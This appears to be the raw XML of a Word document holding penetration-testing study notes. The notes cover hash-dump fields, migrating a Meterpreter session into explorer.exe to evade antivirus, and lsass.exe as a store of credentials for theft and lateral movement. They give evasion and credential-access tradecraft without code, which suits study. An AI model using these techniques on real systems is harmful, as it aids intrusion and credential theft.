          <w:p w14:paraId="6EB61206" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
            <w:r w:rsidRPr="00CD5944">
              <w:t>500</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CD5944" w:rsidRPr="00CD5944" w14:paraId="556ABBA5" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45B54F7C" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
            <w:r w:rsidRPr="00CD5944">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>LM hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57B717EB" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
            <w:r w:rsidRPr="00CD5944">
              <w:t>Old LAN Manager hash (often disabled, may appear as aad3b435...)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="261D8457" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
            <w:r w:rsidRPr="00CD5944">
              <w:t>aad3b435b51404eeaad3b435b51404ee</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CD5944" w:rsidRPr="00CD5944" w14:paraId="156AB2B1" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7AAD9210" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
            <w:r w:rsidRPr="00CD5944">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>NTLM hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FC969F1" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
            <w:r w:rsidRPr="00CD5944">
              <w:t xml:space="preserve">The actual password </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00CD5944">
              <w:t>hash</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00CD5944">
              <w:t xml:space="preserve"> used for authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CF245C1" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
            <w:r w:rsidRPr="00CD5944">
              <w:t>31d6cfe0d16ae931b73c59d7e0c089c0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="53D0842D" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRDefault="00CD5944"/>
    <w:p w14:paraId="72068413" w14:textId="77777777" w:rsidR="00E42B63" w:rsidRDefault="00E42B63" w:rsidP="00E42B63">
      <w:r w:rsidRPr="00E42B63">
        <w:t xml:space="preserve">Migrating to explorer.exe = better </w:t>
      </w:r>
      <w:r w:rsidRPr="00E42B63">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>stability + stealth + user-level access</w:t>
      </w:r>
      <w:r w:rsidRPr="00E42B63">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498633DE" w14:textId="423478AE" w:rsidR="00E42B63" w:rsidRPr="00E42B63" w:rsidRDefault="00E42B63" w:rsidP="00E42B63">
      <w:r w:rsidRPr="00E42B63">
        <w:t xml:space="preserve">Here’s why </w:t>
      </w:r>
      <w:r w:rsidRPr="00E42B63">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>👇</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C80AB7B" w14:textId="77777777" w:rsidR="00E42B63" w:rsidRPr="00E42B63" w:rsidRDefault="00E42B63" w:rsidP="00E42B63">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E42B63">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🧠</w:t>
      </w:r>
      <w:r w:rsidRPr="00E42B63">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E42B63">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>User-level process</w:t>
      </w:r>
      <w:r w:rsidRPr="00E42B63">
        <w:t xml:space="preserve"> – explorer.exe runs under the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E42B63">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>logged-in user</w:t>
      </w:r>
      <w:r w:rsidRPr="00E42B63">
        <w:t>, so migrating into it gives access to that user’s privileges and environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3F73BD" w14:textId="77777777" w:rsidR="00E42B63" w:rsidRPr="00E42B63" w:rsidRDefault="00E42B63" w:rsidP="00E42B63">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E42B63">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🕵️</w:t>
      </w:r>
      <w:r w:rsidRPr="00E42B63">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E42B63">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Stealth</w:t>
      </w:r>
      <w:r w:rsidRPr="00E42B63">
        <w:t xml:space="preserve"> – It’s a </w:t>
      </w:r>
      <w:r w:rsidRPr="00E42B63">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>common, trusted process</w:t>
      </w:r>
      <w:r w:rsidRPr="00E42B63">
        <w:t xml:space="preserve">, so antivirus or monitoring tools are </w:t>
      </w:r>
      <w:r w:rsidRPr="00E42B63">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>less likely to flag it</w:t>
      </w:r>
      <w:r w:rsidRPr="00E42B63">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3047DC46" w14:textId="77777777" w:rsidR="00E42B63" w:rsidRPr="00E42B63" w:rsidRDefault="00E42B63" w:rsidP="00E42B63">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E42B63">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>⚙️</w:t>
      </w:r>
      <w:r w:rsidRPr="00E42B63">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E42B63">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Stability</w:t>
      </w:r>
      <w:r w:rsidRPr="00E42B63">
        <w:t xml:space="preserve"> – explorer.exe stays running as long as the user is logged in, making your Meterpreter session </w:t>
      </w:r>
      <w:r w:rsidRPr="00E42B63">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>more stable</w:t>
      </w:r>
      <w:r w:rsidRPr="00E42B63">
        <w:t xml:space="preserve"> than staying in a temporary or exploited process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDA2F43" w14:textId="77777777" w:rsidR="00E42B63" w:rsidRPr="00E42B63" w:rsidRDefault="00E42B63" w:rsidP="00E42B63">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E42B63">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🔐</w:t>
      </w:r>
      <w:r w:rsidRPr="00E42B63">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E42B63">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Access</w:t>
      </w:r>
      <w:r w:rsidRPr="00E42B63">
        <w:t xml:space="preserve"> – It allows interacting with the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E42B63">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>desktop</w:t>
      </w:r>
      <w:r w:rsidRPr="00E42B63">
        <w:t xml:space="preserve">, user files, and sometimes helps in </w:t>
      </w:r>
      <w:r w:rsidRPr="00E42B63">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>privilege escalation</w:t>
      </w:r>
      <w:r w:rsidRPr="00E42B63">
        <w:t xml:space="preserve"> steps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00540246" w14:textId="27D16218" w:rsidR="00E42B63" w:rsidRPr="00E42B63" w:rsidRDefault="00E42B63" w:rsidP="00E42B63">
      <w:r w:rsidRPr="00E42B63">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00705E65" w:rsidRPr="00DB5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Local Security Authority Subsystem Service (lsass.exe) enforces Windows security</w:t>
      </w:r>
      <w:r w:rsidR="00705E65" w:rsidRPr="00705E65">
        <w:t>: handles logins, access tokens, and stores secrets (password hashes, Kerberos tickets) in memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1564DA85" w14:textId="7A8B201A" w:rsidR="00E42B63" w:rsidRDefault="00705E65">
      <w:r w:rsidRPr="00705E65">
        <w:t xml:space="preserve">its memory can contain </w:t>
      </w:r>
      <w:r w:rsidRPr="00705E65">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NTLM hashes, plaintext credentials, and Kerberos tickets</w:t>
      </w:r>
      <w:r w:rsidRPr="00705E65">
        <w:t xml:space="preserve"> — useful for credential theft and lateral movement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A5019A" w14:textId="77777777" w:rsidR="00B1396B" w:rsidRPr="00B1396B" w:rsidRDefault="00B1396B" w:rsidP="00B1396B">
      <w:r w:rsidRPr="00B1396B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">migrating to lsass.exe usually </w:t>
      </w:r>
      <w:r w:rsidRPr="00B1396B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>increases</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1396B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> detection risk, it does not lower it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533B22D9" w14:textId="77777777" w:rsidR="00B1396B" w:rsidRPr="00B1396B" w:rsidRDefault="00B1396B" w:rsidP="00B1396B">
      <w:r w:rsidRPr="00B1396B">
        <w:t>Why (brief):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB4B7A0" w14:textId="77777777" w:rsidR="00B1396B" w:rsidRPr="00B1396B" w:rsidRDefault="00B1396B" w:rsidP="00B1396B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1396B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pro:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1396B">
        <w:t xml:space="preserve"> gives SYSTEM privileges and access to credentials in memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F531F8" w14:textId="77777777" w:rsidR="00B1396B" w:rsidRPr="00B1396B" w:rsidRDefault="00B1396B" w:rsidP="00B1396B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1396B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Con (big):</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1396B">
        <w:t xml:space="preserve"> lsass.exe is highly monitored and often protected (PPL/Credential Guard); attacking or dumping it commonly triggers EDR/AV alerts and logs — and can crash the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8ABD73" w14:textId="77777777" w:rsidR="00B1396B" w:rsidRPr="00B1396B" w:rsidRDefault="00B1396B" w:rsidP="00B1396B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1396B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Net effect:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1396B">
        <w:t xml:space="preserve"> high value </w:t>
      </w:r>
      <w:r w:rsidRPr="00B1396B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>but</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1396B">
        <w:t xml:space="preserve"> high visibility and danger.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445D7BFD" w14:textId="50BC569E" w:rsidR="00705E65" w:rsidRDefault="00B1396B">
      <w:r w:rsidRPr="00B1396B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Better for stealth:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1396B">
        <w:t xml:space="preserve"> migrate to a common user process like explorer.exe (stable, low visibility).</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1396B">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B1396B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use lsass.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1396B">
        <w:t xml:space="preserve"> only when you </w:t>
      </w:r>
      <w:r w:rsidRPr="00B1396B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>need</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1396B">
        <w:t xml:space="preserve"> its privileges/credentials and accept the detection/crash risk.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00705E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94270"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1CCC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696296"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E572E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19974">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="930426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A27"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="00687456"/>
    <w:rsid w:val="00705E65"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="008B13A6"/>
    <w:rsid w:val="00AA6A27"/>
    <w:rsid w:val="00B1396B"/>
    <w:rsid w:val="00B60194"/>
    <w:rsid w:val="00CD5944"/>
    <w:rsid w:val="00DB51E5"/>
    <w:rsid w:val="00DB5B99"/>
    <w:rsid w:val="00E42B63"/>
    <w:rsid w:val="00F6661E"/>
    <w:rsid w:val="00F93159"/>
    <w:rsid w:val="00FF5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41068"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D80F118F-FA5E-4362-A934-C5087AB7C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A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6A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6A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6A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6A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6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A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6A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6A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6A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6A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6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A27"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00AA6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A27"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00AA6A27"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00AA6A27"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00AA6A27"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00AA6A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6A27"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00AA6A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18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.tmp"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.tmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.tmp"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.jpeg"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.tmp"/><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tmp"/><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tmp"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.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10</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18</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-10T06:29:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-10T07:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>